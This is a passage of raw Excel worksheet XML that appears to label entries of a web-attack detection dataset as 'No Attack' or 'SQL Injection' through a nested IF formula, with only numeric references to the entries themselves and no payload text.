    <row r="19235" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19235" s="1" t="s">
        <v>25724</v>
      </c>
      <c r="B19235">
        <v>1</v>
      </c>
      <c r="C19235" s="7" t="str">
        <f t="shared" si="300"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19236" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19236" s="1" t="s">
        <v>17668</v>
      </c>
      <c r="B19236">
        <v>1</v>
      </c>
      <c r="C19236" s="7" t="str">
        <f t="shared" si="300"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19237" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19237" s="1" t="s">
        <v>13261</v>
      </c>
      <c r="B19237">
        <v>1</v>
      </c>
      <c r="C19237" s="7" t="str">
        <f t="shared" si="300"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19238" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19238" s="1" t="s">
        <v>18455</v>
      </c>
      <c r="B19238">
        <v>1</v>
      </c>
      <c r="C19238" s="7" t="str">
        <f t="shared" si="300"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19239" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19239" s="1" t="s">
        <v>25648</v>
      </c>
      <c r="B19239">
        <v>1</v>
      </c>
      <c r="C19239" s="7" t="str">
        <f t="shared" si="300"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19240" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19240" s="1" t="s">
        <v>16428</v>
      </c>
      <c r="B19240">
        <v>1</v>
      </c>
      <c r="C19240" s="7" t="str">
        <f t="shared" si="300"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19241" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19241" s="1" t="s">
        <v>18350</v>
      </c>
      <c r="B19241">
        <v>1</v>
      </c>
      <c r="C19241" s="7" t="str">
        <f t="shared" si="300"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19242" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19242" s="1" t="s">
        <v>25160</v>
      </c>
      <c r="B19242">
        <v>1</v>
      </c>
      <c r="C19242" s="7" t="str">
        <f t="shared" si="300"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19243" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A19243" s="1" t="s">
        <v>19882</v>
      </c>
      <c r="B19243">
        <v>1</v>
      </c>
      <c r="C19243" s="7" t="str">
        <f t="shared" si="300"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19244" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A19244" s="1" t="s">
        <v>26115</v>
      </c>
      <c r="B19244">
        <v>1</v>
      </c>
      <c r="C19244" s="7" t="str">
        <f t="shared" si="300"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19245" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19245" s="1" t="s">
        <v>15928</v>
      </c>
      <c r="B19245">
        <v>1</v>
      </c>
      <c r="C19245" s="7" t="str">
        <f t="shared" si="300"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19246" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19246" s="1" t="s">
        <v>14103</v>
      </c>
      <c r="B19246">
        <v>1</v>
      </c>
      <c r="C19246" s="7" t="str">
        <f t="shared" si="300"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19247" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19247" s="1" t="s">
        <v>19388</v>
      </c>
      <c r="B19247">
        <v>1</v>
      </c>
      <c r="C19247" s="7" t="str">
        <f t="shared" si="300"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19248" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19248" s="1" t="s">
        <v>16944</v>
      </c>
      <c r="B19248">
        <v>1</v>
      </c>
      <c r="C19248" s="7" t="str">
        <f t="shared" si="300"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19249" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19249" s="1" t="s">
        <v>18021</v>
      </c>
      <c r="B19249">
        <v>1</v>
      </c>
      <c r="C19249" s="7" t="str">
        <f t="shared" si="300"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19250" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19250" s="1" t="s">
        <v>24894</v>
      </c>
      <c r="B19250">
        <v>1</v>
      </c>
      <c r="C19250" s="7" t="str">
        <f t="shared" si="300"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19251" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19251" s="1" t="s">
        <v>15510</v>
      </c>
      <c r="B19251">
        <v>1</v>
      </c>
      <c r="C19251" s="7" t="str">
        <f t="shared" si="300"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19252" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19252" s="1" t="s">
        <v>19841</v>
      </c>
      <c r="B19252">
        <v>1</v>
      </c>
      <c r="C19252" s="7" t="str">
        <f t="shared" si="300"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19253" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19253" s="1" t="s">
        <v>17252</v>
      </c>
      <c r="B19253">
        <v>1</v>
      </c>
      <c r="C19253" s="7" t="str">
        <f t="shared" si="300"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19254" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A19254" s="1" t="s">
        <v>15820</v>
      </c>
      <c r="B19254">
        <v>1</v>
      </c>
      <c r="C19254" s="7" t="str">
        <f t="shared" si="300"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19255" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19255" s="1" t="s">
        <v>14893</v>
      </c>
      <c r="B19255">
        <v>1</v>
      </c>
      <c r="C19255" s="7" t="str">
        <f t="shared" si="300"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19256" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19256" s="1" t="s">
        <v>16002</v>
      </c>
      <c r="B19256">
        <v>1</v>
      </c>
      <c r="C19256" s="7" t="str">
        <f t="shared" si="300"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19257" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19257" s="1" t="s">
        <v>16204</v>
      </c>
      <c r="B19257">
        <v>1</v>
      </c>
      <c r="C19257" s="7" t="str">
        <f t="shared" si="300"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19258" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19258" s="1" t="s">
        <v>26677</v>
      </c>
      <c r="B19258">
        <v>1</v>
      </c>
      <c r="C19258" s="7" t="str">
        <f t="shared" si="300"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19259" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A19259" s="1" t="s">
        <v>24697</v>
      </c>
      <c r="B19259">
        <v>1</v>
      </c>
      <c r="C19259" s="7" t="str">
        <f t="shared" si="300"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19260" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19260" s="1" t="s">
        <v>26048</v>
      </c>
      <c r="B19260">
        <v>1</v>
      </c>
      <c r="C19260" s="7" t="str">
        <f t="shared" si="300"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19261" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19261" s="1" t="s">
        <v>25153</v>
      </c>
      <c r="B19261">
        <v>1</v>
      </c>
      <c r="C19261" s="7" t="str">
        <f t="shared" si="300"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19262" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19262" s="1" t="s">
        <v>14714</v>
      </c>
      <c r="B19262">
        <v>1</v>
      </c>
      <c r="C19262" s="7" t="str">
        <f t="shared" si="300"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19263" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19263" s="1" t="s">
        <v>31529</v>
      </c>
      <c r="B19263">
        <v>0</v>
      </c>
      <c r="C19263" s="7" t="str">
        <f t="shared" si="300"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19264" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A19264" s="1" t="s">
        <v>15809</v>
      </c>
      <c r="B19264">
        <v>1</v>
      </c>
      <c r="C19264" s="7" t="str">
        <f t="shared" si="300"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19265" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19265" s="1" t="s">
        <v>31369</v>
      </c>
      <c r="B19265">
        <v>0</v>
      </c>
      <c r="C19265" s="7" t="str">
        <f t="shared" si="300"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19266" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19266" s="1" t="s">
        <v>18578</v>
      </c>
      <c r="B19266">
        <v>1</v>
      </c>
      <c r="C19266" s="7" t="str">
        <f t="shared" si="300"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19267" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19267" s="1" t="s">
        <v>31964</v>
      </c>
      <c r="B19267">
        <v>0</v>
      </c>
      <c r="C19267" s="7" t="str">
        <f t="shared" ref="C19267:C19330" si="301">IF(B19267=0,"No Attack", IF(B19267=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19268" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19268" s="1" t="s">
        <v>28181</v>
      </c>
      <c r="B19268">
        <v>0</v>
      </c>
      <c r="C19268" s="7" t="str">
        <f t="shared" si="301"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19269" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19269" s="1" t="s">
        <v>26299</v>
      </c>
      <c r="B19269">
        <v>1</v>
      </c>
      <c r="C19269" s="7" t="str">
        <f t="shared" si="301"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19270" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19270" s="1" t="s">
        <v>14405</v>
      </c>
      <c r="B19270">
        <v>1</v>
      </c>
      <c r="C19270" s="7" t="str">
        <f t="shared" si="301"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19271" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19271" s="1" t="s">
        <v>19395</v>
      </c>
      <c r="B19271">
        <v>1</v>
      </c>
      <c r="C19271" s="7" t="str">
        <f t="shared" si="301"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19272" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19272" s="1" t="s">
        <v>13669</v>
      </c>
      <c r="B19272">
        <v>1</v>
      </c>
      <c r="C19272" s="7" t="str">
        <f t="shared" si="301"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19273" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19273" s="1" t="s">
        <v>22454</v>
      </c>
      <c r="B19273">
        <v>0</v>
      </c>
      <c r="C19273" s="7" t="str">
        <f t="shared" si="301"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19274" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19274" s="1" t="s">
        <v>37042</v>
      </c>
      <c r="B19274">
        <v>0</v>
      </c>
      <c r="C19274" s="7" t="str">
        <f t="shared" si="301"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19275" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A19275" s="1" t="s">
        <v>24604</v>
      </c>
      <c r="B19275">
        <v>1</v>
      </c>
      <c r="C19275" s="7" t="str">
        <f t="shared" si="301"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19276" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19276" s="1" t="s">
        <v>17644</v>
      </c>
      <c r="B19276">
        <v>1</v>
      </c>
      <c r="C19276" s="7" t="str">
        <f t="shared" si="301"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19277" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A19277" s="1" t="s">
        <v>15305</v>
      </c>
      <c r="B19277">
        <v>1</v>
      </c>
      <c r="C19277" s="7" t="str">
        <f t="shared" si="301"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19278" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19278" s="1" t="s">
        <v>15511</v>
      </c>
      <c r="B19278">
        <v>1</v>
      </c>
      <c r="C19278" s="7" t="str">
        <f t="shared" si="301"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19279" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19279" s="1" t="s">
        <v>13587</v>
      </c>
      <c r="B19279">
        <v>1</v>
      </c>
      <c r="C19279" s="7" t="str">
        <f t="shared" si="301"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19280" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19280" s="1" t="s">
        <v>19161</v>
      </c>
      <c r="B19280">
        <v>1</v>
      </c>
      <c r="C19280" s="7" t="str">
        <f t="shared" si="301"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19281" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19281" s="1" t="s">
        <v>22612</v>
      </c>
      <c r="B19281">
        <v>0</v>
      </c>
      <c r="C19281" s="7" t="str">
        <f t="shared" si="301"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19282" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19282" s="1" t="s">
        <v>25966</v>
      </c>
      <c r="B19282">
        <v>1</v>
      </c>
      <c r="C19282" s="7" t="str">
        <f t="shared" si="301"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19283" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19283" s="1" t="s">
        <v>20007</v>
      </c>
      <c r="B19283">
        <v>1</v>
      </c>
      <c r="C19283" s="7" t="str">
        <f t="shared" si="301"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19284" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19284" s="1" t="s">
        <v>19834</v>
      </c>
      <c r="B19284">
        <v>1</v>
      </c>
      <c r="C19284" s="7" t="str">
        <f t="shared" si="301"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19285" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19285" s="1" t="s">
        <v>33545</v>
      </c>
      <c r="B19285">
        <v>0</v>
      </c>
      <c r="C19285" s="7" t="str">
        <f t="shared" si="301"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19286" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19286" s="1" t="s">
        <v>15978</v>
      </c>
      <c r="B19286">
        <v>1</v>
      </c>
      <c r="C19286" s="7" t="str">
        <f t="shared" si="301"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19287" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19287" s="1" t="s">
        <v>27249</v>
      </c>
      <c r="B19287">
        <v>0</v>
      </c>
      <c r="C19287" s="7" t="str">
        <f t="shared" si="301"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19288" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19288" s="1" t="s">
        <v>37353</v>
      </c>
      <c r="B19288">
        <v>0</v>
      </c>
      <c r="C19288" s="7" t="str">
        <f t="shared" si="301"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19289" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19289" s="1" t="s">
        <v>18370</v>
      </c>
      <c r="B19289">
        <v>1</v>
      </c>
      <c r="C19289" s="7" t="str">
        <f t="shared" si="301"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19290" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19290" s="1" t="s">
        <v>15056</v>
      </c>
      <c r="B19290">
        <v>1</v>
      </c>
      <c r="C19290" s="7" t="str">
        <f t="shared" si="301"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19291" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19291" s="1" t="s">
        <v>19440</v>
      </c>
      <c r="B19291">
        <v>1</v>
      </c>
      <c r="C19291" s="7" t="str">
        <f t="shared" si="301"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19292" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19292" s="1" t="s">
        <v>14223</v>
      </c>
      <c r="B19292">
        <v>1</v>
      </c>
      <c r="C19292" s="7" t="str">
        <f t="shared" si="301"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19293" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19293" s="1" t="s">
        <v>31797</v>
      </c>
      <c r="B19293">
        <v>0</v>
      </c>
      <c r="C19293" s="7" t="str">
        <f t="shared" si="301"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19294" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19294" s="1" t="s">
        <v>26295</v>
      </c>
      <c r="B19294">
        <v>1</v>
      </c>
      <c r="C19294" s="7" t="str">
        <f t="shared" si="301"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19295" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19295" s="1" t="s">
        <v>16897</v>
      </c>
      <c r="B19295">
        <v>1</v>
      </c>
      <c r="C19295" s="7" t="str">
        <f t="shared" si="301"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19296" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19296" s="1" t="s">
        <v>16000</v>
      </c>
      <c r="B19296">
        <v>1</v>
      </c>
      <c r="C19296" s="7" t="str">
        <f t="shared" si="301"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19297" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19297" s="1" t="s">
        <v>35155</v>
      </c>
      <c r="B19297">
        <v>0</v>
      </c>
      <c r="C19297" s="7" t="str">
        <f t="shared" si="301"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19298" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19298" s="1" t="s">
        <v>30968</v>
      </c>
      <c r="B19298">
        <v>0</v>
      </c>
      <c r="C19298" s="7" t="str">
        <f t="shared" si="301"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19299" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19299" s="1" t="s">
        <v>25175</v>
      </c>
      <c r="B19299">
        <v>1</v>
      </c>
      <c r="C19299" s="7" t="str">
        <f t="shared" si="301"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19300" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19300" s="1" t="s">
        <v>29963</v>
      </c>
      <c r="B19300">
        <v>0</v>
      </c>
      <c r="C19300" s="7" t="str">
        <f t="shared" si="301"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19301" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19301" s="1" t="s">
        <v>36444</v>
      </c>
      <c r="B19301">
        <v>0</v>
      </c>
      <c r="C19301" s="7" t="str">
        <f t="shared" si="301"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19302" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19302" s="1" t="s">
        <v>34262</v>
      </c>
      <c r="B19302">
        <v>0</v>
      </c>
      <c r="C19302" s="7" t="str">
        <f t="shared" si="301"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19303" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19303" s="1" t="s">
        <v>20</v>
      </c>
      <c r="B19303">
        <v>1</v>
      </c>
      <c r="C19303" s="7" t="str">
        <f t="shared" si="301"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19304" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19304" s="1" t="s">
        <v>37459</v>
      </c>
      <c r="B19304">
        <v>0</v>
      </c>
      <c r="C19304" s="7" t="str">
        <f t="shared" si="301"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19305" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19305" s="1" t="s">
        <v>14814</v>
      </c>
      <c r="B19305">
        <v>1</v>
      </c>
      <c r="C19305" s="7" t="str">
        <f t="shared" si="301"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19306" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19306" s="1" t="s">
        <v>22251</v>
      </c>
      <c r="B19306">
        <v>0</v>
      </c>
      <c r="C19306" s="7" t="str">
        <f t="shared" si="301"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19307" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19307" s="1" t="s">
        <v>31080</v>
      </c>
      <c r="B19307">
        <v>0</v>
      </c>
      <c r="C19307" s="7" t="str">
        <f t="shared" si="301"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19308" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19308" s="1" t="s">
        <v>21692</v>
      </c>
      <c r="B19308">
        <v>0</v>
      </c>
      <c r="C19308" s="7" t="str">
        <f t="shared" si="301"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19309" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19309" s="1" t="s">
        <v>12098</v>
      </c>
      <c r="B19309">
        <v>1</v>
      </c>
      <c r="C19309" s="7" t="str">
        <f t="shared" si="301"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19310" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19310" s="1" t="s">
        <v>25336</v>
      </c>
      <c r="B19310">
        <v>1</v>
      </c>
      <c r="C19310" s="7" t="str">
        <f t="shared" si="301"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19311" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19311" s="1" t="s">
        <v>33760</v>
      </c>
      <c r="B19311">
        <v>0</v>
      </c>
      <c r="C19311" s="7" t="str">
        <f t="shared" si="301"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19312" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19312" s="1" t="s">
        <v>16903</v>
      </c>
      <c r="B19312">
        <v>1</v>
      </c>
      <c r="C19312" s="7" t="str">
        <f t="shared" si="301"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19313" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19313" s="1" t="s">
        <v>25927</v>
      </c>
      <c r="B19313">
        <v>1</v>
      </c>
      <c r="C19313" s="7" t="str">
        <f t="shared" si="301"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19314" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19314" s="1" t="s">
        <v>33982</v>
      </c>
      <c r="B19314">
        <v>0</v>
      </c>
      <c r="C19314" s="7" t="str">
        <f t="shared" si="301"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19315" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19315" s="1" t="s">
        <v>13194</v>
      </c>
      <c r="B19315">
        <v>1</v>
      </c>
      <c r="C19315" s="7" t="str">
        <f t="shared" si="301"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19316" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19316" s="1" t="s">
        <v>14476</v>
      </c>
      <c r="B19316">
        <v>1</v>
      </c>
      <c r="C19316" s="7" t="str">
        <f t="shared" si="301"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19317" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19317" s="1" t="s">
        <v>14647</v>
      </c>
      <c r="B19317">
        <v>1</v>
      </c>
      <c r="C19317" s="7" t="str">
        <f t="shared" si="301"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19318" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A19318" s="1" t="s">
        <v>12899</v>
      </c>
      <c r="B19318">
        <v>1</v>
      </c>
      <c r="C19318" s="7" t="str">
        <f t="shared" si="301"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19319" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19319" s="1" t="s">
        <v>32855</v>
      </c>
      <c r="B19319">
        <v>0</v>
      </c>
      <c r="C19319" s="7" t="str">
        <f t="shared" si="301"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19320" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A19320" s="1" t="s">
        <v>25111</v>
      </c>
      <c r="B19320">
        <v>1</v>
      </c>
      <c r="C19320" s="7" t="str">
        <f t="shared" si="301"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19321" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19321" s="1" t="s">
        <v>21240</v>
      </c>
      <c r="B19321">
        <v>0</v>
      </c>
      <c r="C19321" s="7" t="str">
        <f t="shared" si="301"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19322" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19322" s="1" t="s">
        <v>24784</v>
      </c>
      <c r="B19322">
        <v>1</v>
      </c>
      <c r="C19322" s="7" t="str">
        <f t="shared" si="301"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19323" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19323" s="1" t="s">
        <v>17152</v>
      </c>
      <c r="B19323">
        <v>1</v>
      </c>
      <c r="C19323" s="7" t="str">
        <f t="shared" si="301"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19324" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19324" s="1" t="s">
        <v>30312</v>
      </c>
      <c r="B19324">
        <v>0</v>
      </c>
      <c r="C19324" s="7" t="str">
        <f t="shared" si="301"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19325" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19325" s="1" t="s">
        <v>14526</v>
      </c>
      <c r="B19325">
        <v>1</v>
      </c>
      <c r="C19325" s="7" t="str">
        <f t="shared" si="301"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19326" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19326" s="1" t="s">
        <v>17718</v>
      </c>
      <c r="B19326">
        <v>1</v>
      </c>
      <c r="C19326" s="7" t="str">
        <f t="shared" si="301"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19327" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19327" s="1" t="s">
        <v>30439</v>
      </c>
      <c r="B19327">
        <v>0</v>
      </c>
      <c r="C19327" s="7" t="str">
        <f t="shared" si="301"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19328" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19328" s="1" t="s">
        <v>14934</v>
      </c>
      <c r="B19328">
        <v>1</v>
      </c>
      <c r="C19328" s="7" t="str">
        <f t="shared" si="301"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19329" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19329" s="1" t="s">
        <v>19110</v>
      </c>
      <c r="B19329">
        <v>1</v>
      </c>
      <c r="C19329" s="7" t="str">
        <f t="shared" si="301"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19330" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19330" s="1" t="s">
        <v>22581</v>
      </c>
      <c r="B19330">
        <v>0</v>
      </c>
      <c r="C19330" s="7" t="str">
        <f t="shared" si="301"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19331" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19331" s="1" t="s">
        <v>14905</v>
      </c>
      <c r="B19331">
        <v>1</v>
      </c>
      <c r="C19331" s="7" t="str">
        <f t="shared" ref="C19331:C19394" si="302">IF(B19331=0,"No Attack", IF(B19331=1, "SQL Injection", "XSS") )</f>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19332" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19332" s="1" t="s">
        <v>22444</v>
      </c>
      <c r="B19332">
        <v>0</v>
      </c>
      <c r="C19332" s="7" t="str">
        <f t="shared" si="302"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19333" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19333" s="1" t="s">
        <v>34549</v>
      </c>
      <c r="B19333">
        <v>0</v>
      </c>
      <c r="C19333" s="7" t="str">
        <f t="shared" si="302"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="19334" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19334" s="1" t="s">
        <v>19796</v>
      </c>
      <c r="B19334">
        <v>1</v>
      </c>
      <c r="C19334" s="7" t="str">
        <f t="shared" si="302"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19335" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19335" s="1" t="s">
        <v>15278</v>
      </c>
      <c r="B19335">
        <v>1</v>
      </c>
      <c r="C19335" s="7" t="str">
        <f t="shared" si="302"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19336" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19336" s="1" t="s">
        <v>26169</v>
      </c>
      <c r="B19336">
        <v>1</v>
      </c>
      <c r="C19336" s="7" t="str">
        <f t="shared" si="302"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="19337" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A19337" s="1" t="s">
        <v>15596</v>
      </c>
      <c r="B19337">
        <v>1</v>
      </c>
